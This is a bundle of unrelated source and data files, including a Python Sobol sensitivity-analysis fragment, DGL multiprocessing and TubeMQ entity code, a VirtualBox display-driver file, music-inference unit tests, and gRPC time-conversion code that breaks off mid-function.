sample_idx = np.random.choice(T_data, replace=True, size=n_size)
X_rs, Y_rs = X_d[sample_idx], Y[sample_idx]
S1 = compute_first_order(permute_outputs(X_rs, Y_rs), M)
S1 = unskew_S1(S1, M, Y_rs.size)
res[i] = S1
return norm.ppf(0.5 + conf_level / 2.0) * res.std(ddof=1)
def cli_parse(parser):
parser.add_argument('-X', '--model-input-file',
type=str, required=True, help='Model input file')
parser.add_argument('-M', '--M', type=int, required=False,
default=10,
                        help='Interference parameter')
parser.add_argument('-r', '--resamples', type=int, required=False,
default=100,
help='Number of bootstrap resamples for Sobol '
'confidence intervals')
return parser
def cli_action(args):
problem = read_param_file(args.paramfile)
X = np.loadtxt(args.model_input_file,
delimiter=args.delimiter)
Y = np.loadtxt(args.model_output_file,
delimiter=args.delimiter,
usecols=(args.column,))
analyze(problem, X, Y, M=args.M, num_resamples=args.resamples, print_to_console=True, seed=args.seed)
if __name__ == "__main__":
common_args.run_cli(cli_parse, cli_action)
| 2,531 |
9,516 |
<filename>python/dgl/multiprocessing/__init__.py
"""Wrapper of the multiprocessing module for multi-GPU training."""
# To avoid duplicating the graph structure for node classification or link prediction
# training we recommend using fork() rather than spawn() for multiple GPU training.
# However, we need to work around https://github.com/pytorch/pytorch/issues/17199 to
# make fork() and openmp work together.
from .. import backend as F
if F.get_preferred_backend() == 'pytorch':
# Wrap around torch.multiprocessing...
from torch.multiprocessing import *
# ... and override the Process initializer
from .pytorch import Process
else:
# Just import multiprocessing module.
from multiprocessing import * # pylint: disable=redefined-builtin
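# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of this module): how the wrapper above is
# typically driven so that the fork()-friendly Process override launches the
# workers. `run_worker` and the worker count are hypothetical placeholders.
#
#   import dgl.multiprocessing as mp
#
#   def run_worker(rank):
#       ...  # per-worker training loop; the shared graph is built once in the parent
#
#   if __name__ == "__main__":
#       procs = [mp.Process(target=run_worker, args=(rank,)) for rank in range(4)]
#       for p in procs:
#           p.start()
#       for p in procs:
#           p.join()
# ---------------------------------------------------------------------------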
| 237 |
348 |
{"nom":"Airon-Notre-Dame","circ":"4ème circonscription","dpt":"Pas-de-Calais","inscrits":175,"abs":59,"votants":116,"blancs":2,"nuls":8,"exp":106,"res":[{"nuance":"REM","nom":"<NAME>","voix":55},{"nuance":"LR","nom":"<NAME>","voix":51}]}
| 99 |
921 |
// Copyright (c) 2015-2020 <NAME> <<EMAIL>> Use of this source code is governed by the Apache 2.0 license that can be found in the LICENSE file.
package com.vladsch.md.nav.testUtil;
import com.vladsch.flexmark.util.data.DataHolder;
import com.vladsch.md.nav.testUtil.cases.MdEnhCodeInsightFixtureSpecTestCase;
import com.vladsch.plugin.test.util.cases.CodeInsightFixtureSpecTestCase;
import org.jetbrains.annotations.Nullable;
import java.util.HashMap;
import java.util.Map;
public abstract class MdEnhLightPlatformCodeInsightFixtureSpecTestCase extends MdLightPlatformCodeInsightFixtureSpecTestCase implements MdEnhCodeInsightFixtureSpecTestCase {
final private static Map<String, DataHolder> optionsMap = new HashMap<>();
static {
optionsMap.putAll(MdEnhCodeInsightFixtureSpecTestCase.getOptionsMap());
}
public MdEnhLightPlatformCodeInsightFixtureSpecTestCase(@Nullable Map<String, ? extends DataHolder> optionMap, @Nullable DataHolder... defaultOptions) {
super(CodeInsightFixtureSpecTestCase.optionsMaps(optionsMap, optionMap), defaultOptions);
}
}
| 353 |
497 |
{
"type": "industrial",
"width": 3,
"height": 3,
"name": "metal_fabricator",
"sprite": "metal_fabricator.svg",
"description": "Metal Fabricator",
"level": 2,
"power_required": 3,
"pollution": 2,
"production": {
"consumes": {
"labor": 3
},
"produces": {
"wholesale_goods": 8
}
}
}
| 150 |
975 |
package com.dianping.agentsdk.framework;
/**
* Created by hezhi on 16/8/3.
*/
public interface ItemIdInterface {
long getItemId(int section, int position);
}
| 56 |
315 |
/**
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.inlong.tubemq.server.master.bdbstore.bdbentitys;
import com.sleepycat.persist.model.Entity;
import com.sleepycat.persist.model.PrimaryKey;
import java.io.Serializable;
import java.util.Date;
import org.apache.commons.lang.builder.ToStringBuilder;
import org.apache.inlong.tubemq.corebase.TBaseConstants;
import org.apache.inlong.tubemq.corebase.utils.TStringUtils;
import org.apache.inlong.tubemq.server.common.TServerConstants;
import org.apache.inlong.tubemq.server.common.statusdef.EnableStatus;
import org.apache.inlong.tubemq.server.common.utils.WebParameterUtils;
import org.apache.inlong.tubemq.server.master.metamanage.metastore.TStoreConstants;
@Entity
public class BdbGroupFlowCtrlEntity implements Serializable {
private static final long serialVersionUID = 2533735122504168321L;
@PrimaryKey
private String groupName; //group name
private long serialId = -1L; //serial id
private int statusId = -1; // 0:not active; 1: active
private String flowCtrlInfo;
private int ruleCnt = 0; //flow control rule count
private long ssdTranslateId = System.currentTimeMillis();
private boolean needSSDProc = false; //ssd
private String attributes; //extra attributes
    // ** For data compatibility with the original version:
    // the "create" fields in this entity actually hold the last-modified information,
    // while the modified information is stored as the creation information
private String createUser; //create user
private Date createDate; //create date
public BdbGroupFlowCtrlEntity() {
}
//Constructor
public BdbGroupFlowCtrlEntity(final String flowCtrlInfo, final int statusId,
final int ruleCnt, final int qryPriorityId,
final String attributes, final boolean curNeedSSDProc,
final String modifyUser, final Date modifyDate) {
this.statusId = statusId;
this.groupName = TServerConstants.TOKEN_DEFAULT_FLOW_CONTROL;
this.serialId = System.currentTimeMillis();
this.flowCtrlInfo = flowCtrlInfo;
this.attributes = attributes;
this.ruleCnt = ruleCnt;
this.ssdTranslateId = System.currentTimeMillis();
this.needSSDProc = curNeedSSDProc;
this.createUser = modifyUser;
this.createDate = modifyDate;
this.setQryPriorityId(qryPriorityId);
}
//Constructor
public BdbGroupFlowCtrlEntity(final String groupName, final String flowCtrlInfo,
final int statusId, final int ruleCnt,
final int qryPriorityId, final String attributes,
final boolean needSSDProc, final String modifyUser,
final Date modifyDate) {
this.groupName = groupName;
this.serialId = System.currentTimeMillis();
this.statusId = statusId;
this.flowCtrlInfo = flowCtrlInfo;
this.attributes = attributes;
this.ruleCnt = ruleCnt;
this.createUser = modifyUser;
this.createDate = modifyDate;
this.needSSDProc = needSSDProc;
this.ssdTranslateId = TBaseConstants.META_VALUE_UNDEFINED;
this.setQryPriorityId(qryPriorityId);
}
//Constructor
public BdbGroupFlowCtrlEntity(final String groupName, final String flowCtrlInfo,
final int statusId, final int ruleCnt,
final String attributes, final long ssdTranslateId,
final boolean needSSDProc, final String modifyUser,
final Date modifyDate) {
this.groupName = groupName;
this.serialId = System.currentTimeMillis();
this.statusId = statusId;
this.flowCtrlInfo = flowCtrlInfo;
this.attributes = attributes;
this.ruleCnt = ruleCnt;
this.createUser = modifyUser;
this.createDate = modifyDate;
this.needSSDProc = needSSDProc;
this.ssdTranslateId = ssdTranslateId;
}
//Constructor
public BdbGroupFlowCtrlEntity(long serialId, String groupName, String flowCtrlInfo,
int statusId, int ruleCnt, int qryPriorityId,
String attributes, String modifyUser,
Date modifyDate) {
this.groupName = groupName;
this.serialId = serialId;
this.statusId = statusId;
this.flowCtrlInfo = flowCtrlInfo;
this.attributes = attributes;
this.ruleCnt = ruleCnt;
this.createUser = modifyUser;
this.createDate = modifyDate;
this.needSSDProc = false;
this.ssdTranslateId = TBaseConstants.META_VALUE_UNDEFINED;
this.setQryPriorityId(qryPriorityId);
}
public long getSsdTranslateId() {
return ssdTranslateId;
}
public int getRuleCnt() {
return ruleCnt;
}
public void setRuleCnt(int ruleCnt) {
this.ruleCnt = ruleCnt;
}
public long getSerialId() {
return serialId;
}
public String getGroupName() {
return groupName;
}
public void setGroupName(String groupName) {
this.groupName = groupName;
}
public String getAttributes() {
return attributes;
}
public void setAttributes(String attributes) {
this.attributes = attributes;
}
public String getModifyUser() {
return createUser;
}
public boolean isNeedSSDProc() {
return needSSDProc;
}
public void setNeedSSDProc(boolean needSSDProc) {
this.needSSDProc = needSSDProc;
}
public Date getModifyDate() {
return createDate;
}
public String getFlowCtrlInfo() {
return flowCtrlInfo;
}
public void setFlowCtrlInfo(int ruleCnt, String flowCtrlInfo) {
this.ruleCnt = ruleCnt;
this.flowCtrlInfo = flowCtrlInfo;
this.serialId = System.currentTimeMillis();
}
public int getStatusId() {
return statusId;
}
public void setStatusId(int statusId) {
this.statusId = statusId;
this.serialId = System.currentTimeMillis();
}
public boolean isValidStatus() {
return (statusId != 0);
}
public int getQryPriorityId() {
String atrVal =
TStringUtils.getAttrValFrmAttributes(this.attributes,
TStoreConstants.TOKEN_QRY_PRIORITY_ID);
if (atrVal != null) {
return Integer.parseInt(atrVal);
}
return 0;
}
public void setQryPriorityId(int qryPriorityId) {
this.attributes =
TStringUtils.setAttrValToAttributes(this.attributes,
TStoreConstants.TOKEN_QRY_PRIORITY_ID,
String.valueOf(qryPriorityId));
}
public EnableStatus getResCheckStatus() {
String atrVal =
TStringUtils.getAttrValFrmAttributes(this.attributes,
TStoreConstants.TOKEN_RES_CHECK_STATUS);
if (atrVal != null) {
return EnableStatus.valueOf(Integer.parseInt(atrVal));
}
return EnableStatus.STATUS_UNDEFINE;
}
public void setResCheckStatus(EnableStatus resCheckStatus) {
this.attributes =
TStringUtils.setAttrValToAttributes(this.attributes,
TStoreConstants.TOKEN_RES_CHECK_STATUS,
String.valueOf(resCheckStatus.getCode()));
}
public int getAllowedBrokerClientRate() {
String atrVal =
TStringUtils.getAttrValFrmAttributes(this.attributes,
TStoreConstants.TOKEN_BROKER_CLIENT_RATE);
if (atrVal != null) {
return Integer.parseInt(atrVal);
}
return TBaseConstants.META_VALUE_UNDEFINED;
}
public void setAllowedBrokerClientRate(int allowedBrokerClientRate) {
this.attributes =
TStringUtils.setAttrValToAttributes(this.attributes,
TStoreConstants.TOKEN_BROKER_CLIENT_RATE,
String.valueOf(allowedBrokerClientRate));
}
public void setCreateInfo(String createUser, Date createDate) {
if (TStringUtils.isNotBlank(createUser)) {
this.attributes =
TStringUtils.setAttrValToAttributes(this.attributes,
TStoreConstants.TOKEN_CREATE_USER, createUser);
}
if (createDate != null) {
String dataStr = WebParameterUtils.date2yyyyMMddHHmmss(createDate);
this.attributes =
TStringUtils.setAttrValToAttributes(this.attributes,
TStoreConstants.TOKEN_CREATE_DATE, dataStr);
}
}
public String getCreateUser() {
return TStringUtils.getAttrValFrmAttributes(
this.attributes, TStoreConstants.TOKEN_CREATE_USER);
}
public Date getCreateDate() {
String dateStr = TStringUtils.getAttrValFrmAttributes(
this.attributes, TStoreConstants.TOKEN_CREATE_DATE);
return WebParameterUtils.yyyyMMddHHmmss2date(dateStr);
}
public String getStrModifyDate() {
return WebParameterUtils.date2yyyyMMddHHmmss(createDate);
}
public String getStrCreateDate() {
return TStringUtils.getAttrValFrmAttributes(
this.attributes, TStoreConstants.TOKEN_CREATE_DATE);
}
@Override
public String toString() {
return new ToStringBuilder(this)
.append("groupName", groupName)
.append("serialId", serialId)
.append("statusId", statusId)
.append("flowCtrlInfo", ".....")
.append("ruleCnt", ruleCnt)
.append("ssdTranslateId", ssdTranslateId)
.append("needSSDProc", needSSDProc)
.append("attributes", attributes)
.append("createUser", getCreateUser())
.append("createDate", getCreateUser())
.append("modifyUser", createUser)
.append("modifyDate", getStrModifyDate())
.toString();
}
/**
* Serialize config field to json format
*
* @param sBuilder
* @return
*/
public StringBuilder toJsonString(final StringBuilder sBuilder) {
return sBuilder.append("{\"type\":\"BdbGroupFlowCtrlEntity\",")
.append("\"groupName\":\"").append(groupName)
.append("\",\"statusId\":").append(statusId)
.append(",\"ssdTranslateId\":").append(ssdTranslateId)
.append(",\"ruleCnt\":").append(ruleCnt)
.append(",\"needSSDProc\":").append(needSSDProc)
.append(",\"serialId\":").append(serialId)
.append(",\"qryPriorityId\":").append(getQryPriorityId())
.append(",\"flowCtrlInfo\":").append(flowCtrlInfo)
.append(", \"attributes\":\"").append(attributes)
.append(",\"createUser\":\"").append(getCreateUser())
.append("\",\"createDate\":\"").append(getStrCreateDate())
.append("\",\"modifyUser\":\"").append(createUser)
.append("\",\"modifyDate\":\"").append(getStrModifyDate())
.append("\"}");
}
}
| 5,471 |
521 |
<filename>third_party/virtualbox/src/VBox/Additions/WINNT/Graphics/Video/disp/wddm/VBoxUhgsmiDisp.cpp
/* $Id: VBoxUhgsmiDisp.cpp $ */
/** @file
* VBoxVideo Display D3D User mode dll
*/
/*
* Copyright (C) 2011-2017 Oracle Corporation
*
* This file is part of VirtualBox Open Source Edition (OSE), as
* available from http://www.virtualbox.org. This file is free software;
* you can redistribute it and/or modify it under the terms of the GNU
* General Public License (GPL) as published by the Free Software
* Foundation, in version 2 as it comes in the "COPYING" file of the
* VirtualBox OSE distribution. VirtualBox OSE is distributed in the
* hope that it will be useful, but WITHOUT ANY WARRANTY of any kind.
*/
#include "VBoxDispD3DCmn.h"
#define VBOXUHGSMID3D_GET_PRIVATE(_p, _t) ((_t*)(((uint8_t*)_p) - RT_OFFSETOF(_t, BasePrivate.Base)))
#define VBOXUHGSMID3D_GET(_p) VBOXUHGSMID3D_GET_PRIVATE(_p, VBOXUHGSMI_PRIVATE_D3D)
#include <iprt/mem.h>
#include <iprt/err.h>
DECLCALLBACK(int) vboxUhgsmiD3DBufferDestroy(PVBOXUHGSMI_BUFFER pBuf)
{
PVBOXUHGSMI_BUFFER_PRIVATE_DX_ALLOC_BASE pBuffer = VBOXUHGSMDXALLOCBASE_GET_BUFFER(pBuf);
struct VBOXWDDMDISP_DEVICE *pDevice = VBOXUHGSMID3D_GET(pBuffer->BasePrivate.pHgsmi)->pDevice;
D3DDDICB_DEALLOCATE DdiDealloc;
DdiDealloc.hResource = 0;
DdiDealloc.NumAllocations = 1;
DdiDealloc.HandleList = &pBuffer->hAllocation;
HRESULT hr = pDevice->RtCallbacks.pfnDeallocateCb(pDevice->hDevice, &DdiDealloc);
if (hr == S_OK)
{
#ifdef DEBUG_misha
memset(pBuffer, 0, sizeof (*pBuffer));
#endif
RTMemFree(pBuffer);
return VINF_SUCCESS;
}
WARN(("pfnDeallocateCb failed, hr %#x", hr));
return VERR_GENERAL_FAILURE;
}
/* typedef DECLCALLBACK(int) FNVBOXUHGSMI_BUFFER_LOCK(PVBOXUHGSMI_BUFFER pBuf, uint32_t offLock, uint32_t cbLock, VBOXUHGSMI_BUFFER_LOCK_FLAGS fFlags, void**pvLock); */
DECLCALLBACK(int) vboxUhgsmiD3DBufferLock(PVBOXUHGSMI_BUFFER pBuf, uint32_t offLock, uint32_t cbLock, VBOXUHGSMI_BUFFER_LOCK_FLAGS fFlags, void**pvLock)
{
PVBOXUHGSMI_BUFFER_PRIVATE_DX_ALLOC_BASE pBuffer = VBOXUHGSMDXALLOCBASE_GET_BUFFER(pBuf);
struct VBOXWDDMDISP_DEVICE *pDevice = VBOXUHGSMID3D_GET(pBuffer->BasePrivate.pHgsmi)->pDevice;
D3DDDICB_LOCK DdiLock = {0};
DdiLock.hAllocation = pBuffer->hAllocation;
DdiLock.PrivateDriverData = 0;
int rc = vboxUhgsmiBaseDxLockData(pBuffer, offLock, cbLock, fFlags,
&DdiLock.Flags, &DdiLock.NumPages);
if (!RT_SUCCESS(rc))
{
WARN(("vboxUhgsmiBaseDxLockData failed rc %d", rc));
return rc;
}
if (DdiLock.NumPages)
DdiLock.pPages = pBuffer->aLockPageIndices;
else
DdiLock.pPages = NULL;
HRESULT hr = pDevice->RtCallbacks.pfnLockCb(pDevice->hDevice, &DdiLock);
if (hr == S_OK)
{
*pvLock = (void*)(((uint8_t*)DdiLock.pData) + (offLock & 0xfff));
return VINF_SUCCESS;
}
WARN(("pfnLockCb failed, hr %#x", hr));
return VERR_GENERAL_FAILURE;
}
DECLCALLBACK(int) vboxUhgsmiD3DBufferUnlock(PVBOXUHGSMI_BUFFER pBuf)
{
PVBOXUHGSMI_BUFFER_PRIVATE_DX_ALLOC_BASE pBuffer = VBOXUHGSMDXALLOCBASE_GET_BUFFER(pBuf);
struct VBOXWDDMDISP_DEVICE *pDevice = VBOXUHGSMID3D_GET(pBuffer->BasePrivate.pHgsmi)->pDevice;
D3DDDICB_UNLOCK DdiUnlock;
DdiUnlock.NumAllocations = 1;
DdiUnlock.phAllocations = &pBuffer->hAllocation;
HRESULT hr = pDevice->RtCallbacks.pfnUnlockCb(pDevice->hDevice, &DdiUnlock);
if (hr == S_OK)
return VINF_SUCCESS;
WARN(("pfnUnlockCb failed, hr %#x", hr));
return VERR_GENERAL_FAILURE;
}
/*typedef DECLCALLBACK(int) FNVBOXUHGSMI_BUFFER_CREATE(PVBOXUHGSMI pHgsmi, uint32_t cbBuf, VBOXUHGSMI_BUFFER_TYPE_FLAGS fType, PVBOXUHGSMI_BUFFER* ppBuf);*/
DECLCALLBACK(int) vboxUhgsmiD3DBufferCreate(PVBOXUHGSMI pHgsmi, uint32_t cbBuf, VBOXUHGSMI_BUFFER_TYPE_FLAGS fType, PVBOXUHGSMI_BUFFER* ppBuf)
{
if (!cbBuf)
return VERR_INVALID_PARAMETER;
int rc = VINF_SUCCESS;
cbBuf = VBOXWDDM_ROUNDBOUND(cbBuf, 0x1000);
Assert(cbBuf);
uint32_t cPages = cbBuf >> 12;
Assert(cPages);
PVBOXUHGSMI_PRIVATE_D3D pPrivate = VBOXUHGSMID3D_GET(pHgsmi);
PVBOXUHGSMI_BUFFER_PRIVATE_DX_ALLOC_BASE pBuf;
pBuf = (PVBOXUHGSMI_BUFFER_PRIVATE_DX_ALLOC_BASE)RTMemAllocZ(RT_UOFFSETOF_DYN(VBOXUHGSMI_BUFFER_PRIVATE_DX_ALLOC_BASE,
aLockPageIndices[cPages]));
if (pBuf)
{
D3DDDICB_ALLOCATE DdiAlloc;
D3DDDI_ALLOCATIONINFO DdiAllocInfo;
VBOXWDDM_ALLOCINFO AllocInfo;
memset(&DdiAlloc, 0, sizeof (DdiAlloc));
DdiAlloc.hResource = NULL;
DdiAlloc.hKMResource = NULL;
DdiAlloc.NumAllocations = 1;
DdiAlloc.pAllocationInfo = &DdiAllocInfo;
vboxUhgsmiBaseDxAllocInfoFill(&DdiAllocInfo, &AllocInfo, cbBuf, fType);
HRESULT hr = pPrivate->pDevice->RtCallbacks.pfnAllocateCb(pPrivate->pDevice->hDevice, &DdiAlloc);
if (hr == S_OK)
{
Assert(DdiAllocInfo.hAllocation);
pBuf->BasePrivate.Base.pfnLock = vboxUhgsmiD3DBufferLock;
pBuf->BasePrivate.Base.pfnUnlock = vboxUhgsmiD3DBufferUnlock;
pBuf->BasePrivate.Base.pfnDestroy = vboxUhgsmiD3DBufferDestroy;
pBuf->BasePrivate.Base.fType = fType;
pBuf->BasePrivate.Base.cbBuffer = cbBuf;
pBuf->BasePrivate.pHgsmi = &pPrivate->BasePrivate;
pBuf->hAllocation = DdiAllocInfo.hAllocation;
*ppBuf = &pBuf->BasePrivate.Base;
return VINF_SUCCESS;
}
else
{
WARN(("pfnAllocateCb failed hr %#x"));
rc = VERR_GENERAL_FAILURE;
}
RTMemFree(pBuf);
}
else
{
WARN(("RTMemAllocZ failed"));
rc = VERR_NO_MEMORY;
}
return rc;
}
/* typedef DECLCALLBACK(int) FNVBOXUHGSMI_BUFFER_SUBMIT(PVBOXUHGSMI pHgsmi, PVBOXUHGSMI_BUFFER_SUBMIT aBuffers, uint32_t cBuffers); */
DECLCALLBACK(int) vboxUhgsmiD3DBufferSubmit(PVBOXUHGSMI pHgsmi, PVBOXUHGSMI_BUFFER_SUBMIT aBuffers, uint32_t cBuffers)
{
PVBOXUHGSMI_PRIVATE_D3D pHg = VBOXUHGSMID3D_GET(pHgsmi);
PVBOXWDDMDISP_DEVICE pDevice = pHg->pDevice;
UINT cbDmaCmd = pDevice->DefaultContext.ContextInfo.CommandBufferSize;
int rc = vboxUhgsmiBaseDxDmaFill(aBuffers, cBuffers,
pDevice->DefaultContext.ContextInfo.pCommandBuffer, &cbDmaCmd,
pDevice->DefaultContext.ContextInfo.pAllocationList, pDevice->DefaultContext.ContextInfo.AllocationListSize,
pDevice->DefaultContext.ContextInfo.pPatchLocationList, pDevice->DefaultContext.ContextInfo.PatchLocationListSize);
if (RT_FAILURE(rc))
{
WARN(("vboxUhgsmiBaseDxDmaFill failed, rc %d", rc));
return rc;
}
D3DDDICB_RENDER DdiRender = {0};
DdiRender.CommandLength = cbDmaCmd;
Assert(DdiRender.CommandLength);
Assert(DdiRender.CommandLength < UINT32_MAX/2);
DdiRender.CommandOffset = 0;
DdiRender.NumAllocations = cBuffers;
DdiRender.NumPatchLocations = 0;
// DdiRender.NewCommandBufferSize = sizeof (VBOXVDMACMD) + 4 * (100);
// DdiRender.NewAllocationListSize = 100;
// DdiRender.NewPatchLocationListSize = 100;
DdiRender.hContext = pDevice->DefaultContext.ContextInfo.hContext;
HRESULT hr = pDevice->RtCallbacks.pfnRenderCb(pDevice->hDevice, &DdiRender);
if (hr == S_OK)
{
pDevice->DefaultContext.ContextInfo.CommandBufferSize = DdiRender.NewCommandBufferSize;
pDevice->DefaultContext.ContextInfo.pCommandBuffer = DdiRender.pNewCommandBuffer;
pDevice->DefaultContext.ContextInfo.AllocationListSize = DdiRender.NewAllocationListSize;
pDevice->DefaultContext.ContextInfo.pAllocationList = DdiRender.pNewAllocationList;
pDevice->DefaultContext.ContextInfo.PatchLocationListSize = DdiRender.NewPatchLocationListSize;
pDevice->DefaultContext.ContextInfo.pPatchLocationList = DdiRender.pNewPatchLocationList;
return VINF_SUCCESS;
}
WARN(("pfnRenderCb failed, hr %#x", hr));
return VERR_GENERAL_FAILURE;
}
static DECLCALLBACK(int) vboxCrHhgsmiDispEscape(struct VBOXUHGSMI_PRIVATE_BASE *pHgsmi, void *pvData, uint32_t cbData, BOOL fHwAccess)
{
PVBOXUHGSMI_PRIVATE_D3D pPrivate = VBOXUHGSMID3D_GET(pHgsmi);
PVBOXWDDMDISP_DEVICE pDevice = pPrivate->pDevice;
D3DDDICB_ESCAPE DdiEscape = {0};
DdiEscape.hContext = pDevice->DefaultContext.ContextInfo.hContext;
DdiEscape.hDevice = pDevice->hDevice;
DdiEscape.Flags.HardwareAccess = !!fHwAccess;
DdiEscape.pPrivateDriverData = pvData;
DdiEscape.PrivateDriverDataSize = cbData;
HRESULT hr = pDevice->RtCallbacks.pfnEscapeCb(pDevice->pAdapter->hAdapter, &DdiEscape);
if (SUCCEEDED(hr))
{
return VINF_SUCCESS;
}
WARN(("pfnEscapeCb failed, hr 0x%x", hr));
return VERR_GENERAL_FAILURE;
}
void vboxUhgsmiD3DInit(PVBOXUHGSMI_PRIVATE_D3D pHgsmi, PVBOXWDDMDISP_DEVICE pDevice)
{
pHgsmi->BasePrivate.Base.pfnBufferCreate = vboxUhgsmiD3DBufferCreate;
pHgsmi->BasePrivate.Base.pfnBufferSubmit = vboxUhgsmiD3DBufferSubmit;
    /* escape is still needed, since UHGSMI uses it e.g. to query the connection id */
pHgsmi->BasePrivate.pfnEscape = vboxCrHhgsmiDispEscape;
pHgsmi->pDevice = pDevice;
}
void vboxUhgsmiD3DEscInit(PVBOXUHGSMI_PRIVATE_D3D pHgsmi, struct VBOXWDDMDISP_DEVICE *pDevice)
{
vboxUhgsmiBaseInit(&pHgsmi->BasePrivate, vboxCrHhgsmiDispEscape);
pHgsmi->pDevice = pDevice;
}
| 4,526 |
1,145 |
import numpy as np
from omnizart.music import inference as inf
def generate_pred(frame_size, on_pitch, scale=4, occur_num=3):
pred = np.zeros((frame_size, 88*scale))
for idx, pitch in enumerate(on_pitch):
pitch_range = range(pitch*scale, (pitch+1)*scale)
occur_pos = np.random.choice(pitch_range, size=occur_num, replace=False)
pred[idx, occur_pos] = 1
return pred
def validate_down_sample(out, on_pitch):
for idx, frm in enumerate(out):
occur_idx = np.where(frm>0)[0][0]
assert occur_idx == on_pitch[idx]
def test_roll_down_sample():
bar = np.array([
[1, 1, 0, 0, 0, 1, 1, 0.6, 0.4, 0.1, 0, 0],
[1, 1, 0.5, 0, 0, 0.8, 1, 0.6, 0.2, 0.1, 0, 0.5],
[1, 1, 0.2, 0, 0, 0.7, 0, 0.6, 0.3, 0.1, 0, 0.1],
[1, 0, 0, 0, 0.1, 0.9, 0, 0.6, 0.2, 0.1, 0, 0.2]
]).T
expected_bar = np.array([1, 0.75, 0.175, 0, 0.025, 0.85, 0.5, 0.6, 0.275, 0.1, 0, 0.2])
data = np.zeros((200, 352))
data[:12, :4] = bar
data[50:62, 40:44] = bar
out = inf.roll_down_sample(data)
assert out.shape == (200, 88)
assert np.array_equal(out[:12, 0], expected_bar)
assert np.array_equal(out[50:62, 10], expected_bar)
def test_down_sample():
frame_size = 300
channels = 10
preds = []
on_pitches = []
for _ in range(channels):
on_pitch = np.random.randint(88, size=frame_size)
pred = generate_pred(frame_size, on_pitch)
on_pitches.append(on_pitch)
preds.append(pred)
preds = np.dstack(preds)
outs = inf.down_sample(preds)
assert outs.shape == (frame_size, 88, channels)
for idx in range(channels):
validate_down_sample(outs[:,:,idx], on_pitches[idx])
def test_find_occur():
data = np.array([1, 1, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1])
expected = [{"onset": 0, "offset": 1}, {"onset": 7, "offset": 11}, {"onset": 13, "offset": 15}]
out = inf.find_occur(data)
assert out == expected
out = inf.find_occur(data, min_duration=0.01)
assert out == expected
out = inf.find_occur(data, t_unit=0.01)
assert out == [{"onset": 7, "offset": 11}, {"onset": 13, "offset": 15}]
out = inf.find_occur(data, min_duration=0.07)
assert out == [{"onset": 7, "offset": 11}]
assert inf.find_occur(np.array([0, 0, 0])) == []
def test_find_min_max_stren():
stren = np.random.random(500)
max_v, min_v = np.max(stren), np.min(stren)
notes = [{"stren": stv} for stv in stren]
assert inf.find_min_max_stren(notes) == (min_v, max_v)
assert inf.find_min_max_stren([]) == (0.5, 0.5)
def test_infer_pitch():
zeros = np.zeros(50)
onset = np.array([
        0, 2.5, 3.1, 3, 3, 2.8, 2, 3.3, 3, 2.9, 2.8, 2.8, 1, 0,  # Two peaks; the first is filtered out because the peaks are too close together
        0, 0, 2, 2.6, 3, 3, 3.1, 3, 1.2, 1.4, 0, 0, 0, 0,  # One peak
        0.3, 0.2, 0, 0.1, 0, 0, 2.3, 2.4, 2.5, 2.6, 2.2, 2,  # One peak, eliminated because its duration is too short
0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0
])
dura = np.array([
0, 0, 0.5, 0.8, 1.8, 2, 2, 0.6, 1.5, 1.3, 1.4, 1.9, 2.5, 2.6,
0, 0, 0, 0, 0, 0.2, 0.3, 0.8, 1.2, 1.4, 1.8, 2, 2, 1,
0.8, 0.4, 0, 0, 0, 0, 0, 0, 0, 0.1, 0.3, 0.8, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0
])
expected = [
{"start": 7, "end": 20, "stren": 3.3},
{"start": 20, "end": 30, "stren": 3.1}
]
pitch = np.stack([zeros, dura, onset], axis=1)
out = inf.infer_pitch(pitch)
assert out == expected
assert inf.infer_pitch(pitch, shortest=30) == []
pitch[:, 2] = 0
assert inf.infer_pitch(pitch) == []
| 1,860 |
348 |
{"nom":"Garindein","circ":"4ème circonscription","dpt":"Pyrénées-Atlantiques","inscrits":410,"abs":185,"votants":225,"blancs":13,"nuls":16,"exp":196,"res":[{"nuance":"DVD","nom":"<NAME>","voix":121},{"nuance":"REM","nom":"<NAME>","voix":75}]}
| 96 |
511 |
/*
*
* Copyright 2015 gRPC authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*/
#include <grpc++/support/config.h>
#include <grpc++/support/time.h>
#include <grpc/support/time.h>
using std::chrono::duration_cast;
using std::chrono::high_resolution_clock;
using std::chrono::nanoseconds;
using std::chrono::seconds;
using std::chrono::system_clock;
namespace grpc {
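// Both helpers below convert a std::chrono time_point into a gpr_timespec with
// second/nanosecond resolution. Deadlines at time_point::max(), beyond gpr's
// representable range, or with negative seconds are all clamped to the
// gpr_inf_future sentinel (see the explicit checks in each function).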
void Timepoint2Timespec(const system_clock::time_point& from,
gpr_timespec* to) {
system_clock::duration deadline = from.time_since_epoch();
seconds secs = duration_cast<seconds>(deadline);
if (from == system_clock::time_point::max() ||
secs.count() >= gpr_inf_future(GPR_CLOCK_REALTIME).tv_sec ||
secs.count() < 0) {
*to = gpr_inf_future(GPR_CLOCK_REALTIME);
return;
}
nanoseconds nsecs = duration_cast<nanoseconds>(deadline - secs);
to->tv_sec = (int64_t)secs.count();
to->tv_nsec = (int32_t)nsecs.count();
to->clock_type = GPR_CLOCK_REALTIME;
}
void TimepointHR2Timespec(const high_resolution_clock::time_point& from,
gpr_timespec* to) {
high_resolution_clock::duration deadline = from.time_since_epoch();
seconds secs = duration_cast<seconds>(deadline);
if (from == high_resolution_clock::time_point::max() ||
secs.count() >= gpr_inf_future(GPR_CLOCK_REALTIME).tv_sec ||
secs.count() < 0) {
*to = gpr_inf_future(GPR_CLOCK_REALTIME);
return;
}
